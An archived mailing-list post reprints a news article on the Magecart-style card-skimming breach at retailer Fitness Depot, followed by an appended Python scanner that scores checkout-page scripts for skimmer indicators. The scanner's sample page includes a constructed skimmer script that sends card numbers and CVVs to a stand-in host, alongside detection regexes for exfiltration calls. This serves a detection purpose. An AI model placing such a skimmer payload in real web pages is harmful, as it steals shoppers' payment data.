BreachExchange mailing list archives
Fitness Depot hit by data breach after ISP fails to 'activate the antivirus'
From: Destry Winant <destry () riskbasedsecurity com>
Date: Tue, 9 Jun 2020 08:49:53 -0500
https://www.bleepingcomputer.com/news/security/fitness-depot-hit-by-data-breach-after-isp-fails-to-activate-the-antivirus/

Canadian retailer Fitness Depot announced to customers that their personal and financial information was stolen following a breach that affected the company's e-commerce platform last month.

Fitness Depot is the largest specialty exercise equipment retailer in Canada, with 40 stores nationwide and two in the United States, in Dallas and Houston, Texas.

Signs of a Magecart attack

Based on the info in the breach notification letter the company sent to all potentially impacted individuals, the attack has all the signs of a textbook Magecart attack, where the threat actors were able to compromise Fitness Depot's online store and inject a malicious form designed to harvest and exfiltrate customer information.

In such attacks, cybercrime groups known as Magecart groups hack e-commerce stores and inject malicious JavaScript-based scripts into their checkout pages as part of web skimming (aka e-skimming) attacks. The attackers' end goal is to steal all the payment or personal information submitted by the compromised sites' customers and to collect it on remote servers under their control.

Digital skimming detection security firm Sansec spotted the payment card skimmers injected in Fitness Depot's e-commerce platform between April 2 and May 17, as shown by a public crawler detection report shared with BleepingComputer by the company's CEO and founder, Willem de Groot.

Not all customers were affected

In a letter sent to affected customers, the company says that the attackers may have accessed or stolen the information of clients "who made purchases for delivery and or who made purchases for in-store pick up at one of our retail locations."

The information accessed or harvested by the attackers may have included the impacted customers' name, address, email address, telephone number, and credit card number.
The breach goes as far back as February 18, 2020, according to Fitness Depot's data breach notification, and it started with a malicious form being injected within the online store.

"Once our customers where (sic) redirected to this form the customer information was copied without the authorization or knowledge of Fitness Depot," the company says. "This is how the personal information was captured and stolen."

Only customers with home delivery were impacted between February 18 and April 27, while from April 28 to May 22 "any customer that ordered product for Home delivery or ordered product for in-store pick-up could have been potentially affected."

The ISP gets blamed for the breach

Fitness Depot blames its internet service provider (ISP) for the data breach, saying that "[b]ased on our preliminary findings it appears our Internet Service Provider [ISP] neglected to activate the anti-virus software on our account."

It is not yet known what the Canadian fitness retailer refers to, since it is not an ISP's job to protect its customers' e-commerce platforms with anti-malware solutions. BleepingComputer has reached out to Fitness Depot for more details but had not heard back at the time of this publication.

Additionally, while Fitness Depot said that "personal information was captured and stolen," the company also says that it "has no knowledge that any of our customer information was compromised in any manner."

Fitness Depot also advises customers to keep an eye out for identity theft or fraud attempts by monitoring their free credit reports and reviewing account statements.

Update June 8: Added information on credit card skimmer scripts found on Fitness Depot's online store.

_______________________________________________
BreachExchange mailing list sponsored by Risk Based Security
BreachExchange () lists riskbasedsecurity com
https://lists.riskbasedsecurity.com/listinfo/breachexchange
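The article describes the mechanism (injected JavaScript on the checkout page reads the payment fields and ships them to an attacker-controlled host) and notes that Sansec's crawler spotted the skimmer from the outside. The following is an added example, not code from the article, from Sansec or from Fitness Depot, of the kind of heuristic such a page scanner applies: pull every script off a checkout page and score each one on the indicators a skimmer usually combines (reads payment fields, uses a network primitive, targets a host outside the shop's allowlist, obfuscates). The sample page, the field names, the allowlisted hosts and the skimmer-like payload are all constructed for the demo and stand in for no real site or campaign.

```python
"""Heuristic Magecart-style skimmer scanner for a checkout page.

Added example (not the article's or Sansec's code). It extracts every
<script> from an HTML document and scores it on four indicators:
  1. reads payment/card fields
  2. uses a network primitive that can exfiltrate data
  3. references a host outside the shop's allowlist
  4. uses common obfuscation/encoding helpers
A legitimate validation script trips at most one; a skimmer tends to trip
several. Everything below (hosts, field names, sample page) is constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the shop legitimately serves scripts from (assumption for the demo).
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}

# Indicator patterns (constructed; tune per site).
PAYMENT_FIELDS = re.compile(r"card[_-]?number|cc[_-]?num|cvv|cvc|expir", re.I)
EXFIL_PRIMITIVES = re.compile(
    r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=", re.I)
OBFUSCATION = re.compile(r"atob\(|btoa\(|fromCharCode|unescape\(|\\x[0-9a-f]{2}", re.I)
URL_LITERAL = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collect (src, inline body) for every <script> element on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        # Script bodies arrive as CDATA chunks; buffer and join them.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def external_hosts(text):
    """Hosts named in URL literals that are not on the allowlist."""
    return {m.group(1).lower() for m in URL_LITERAL.finditer(text)
            if m.group(1).lower() not in ALLOWED_HOSTS}


def score_script(src, body):
    """Return (score, reasons) for one script; higher is more skimmer-like."""
    reasons = []
    if src:
        host = urlparse(src).hostname
        if host and host.lower() not in ALLOWED_HOSTS:
            reasons.append(f"third-party script host {host}")
    if PAYMENT_FIELDS.search(body):
        reasons.append("reads payment fields")
    if EXFIL_PRIMITIVES.search(body):
        reasons.append("uses a network/exfil primitive")
    hosts = external_hosts(body)
    if hosts:
        reasons.append("contacts non-allowlisted host(s): " + ", ".join(sorted(hosts)))
    if OBFUSCATION.search(body):
        reasons.append("obfuscation")
    return len(reasons), reasons


def scan_page(html):
    """Score every script on the page; returns one finding per script."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for idx, (src, body) in enumerate(collector.scripts):
        score, reasons = score_script(src, body)
        findings.append({"index": idx, "src": src, "score": score, "reasons": reasons})
    return findings


def suspicious(findings, threshold=3):
    """Findings that combine enough indicators to warrant a manual look."""
    return [f for f in findings if f["score"] >= threshold]


# Constructed checkout page: a first-party bundle, a third-party widget,
# a benign inline validator, and a skimmer-like inline payload.
SAMPLE_PAGE = r"""<html><body>
<form id="checkout">
  <input name="card_number"><input name="cvv"><input name="expiry">
</form>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="https://widgets.thirdparty.example/chat.js"></script>
<script>
  // benign: client-side validation only
  document.getElementById('checkout').addEventListener('submit', function (e) {
    if (!/^\d{16}$/.test(document.querySelector('[name=card_number]').value)) e.preventDefault();
  });
</script>
<script>
  // constructed skimmer-like payload: hooks submit and beacons the fields out
  document.getElementById('checkout').addEventListener('submit', function () {
    var d = document.querySelector('[name=card_number]').value + '|' +
            document.querySelector('[name=cvv]').value;
    new Image().src = 'https://stats-collector.example/g.png?d=' + btoa(d);
  });
</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE):
        print(f["index"], f["src"] or "(inline)", f["score"], "; ".join(f["reasons"]))
```

The point of scoring rather than pattern-matching a single string is the one the article illustrates: a skimmer is a normal-looking checkout hook plus an outbound request, so each indicator alone is common on a legitimate page (the validator above reads the card field; the chat widget is third-party) and only their combination is worth an alert. A real crawler would also fetch each external `src` and score its body the same way, since Magecart payloads are more often loaded from a remote host than left inline, and would diff results across crawls to catch the period in which an injection appears.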
Current thread:
- Fitness Depot hit by data breach after ISP fails to 'activate the antivirus' Destry Winant (Jun 09)